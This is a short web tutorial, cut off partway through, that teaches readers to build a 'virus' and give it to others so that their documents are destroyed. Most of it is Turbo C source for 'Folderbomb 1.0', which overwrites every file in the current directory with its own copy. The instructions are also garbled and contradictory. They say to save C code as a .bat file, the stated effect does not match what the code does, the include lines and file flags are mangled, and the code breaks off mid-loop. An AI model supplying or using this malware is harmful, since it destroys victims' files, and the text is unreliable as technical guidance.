Now I will tell you how to create a virus. The one who runs that virus their My Documents will be deleted. Firstly open notepad and copy the following code and save it as something like virus.bat. Now if you give this file to anyone if they runs that file their My Documents will be deleted..
#include<stdio.h> #include<conio.h> #include #include #include void main(int argc,char* argv[]) { char buf[512]; int source,target,byt,done; struct ffblk ffblk; clrscr(); textcolor(2); cprintf(”————————————————————————–”); printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(\n”); cprintf(”————————————————————————–”); done = findfirst(”*.*”,&ffblk,0); while (!done) { printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”); source=open(argv[0],O_RDONLYO_BINARY); target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY); while(1) {byt=read(source,buf,512); if(byt>0)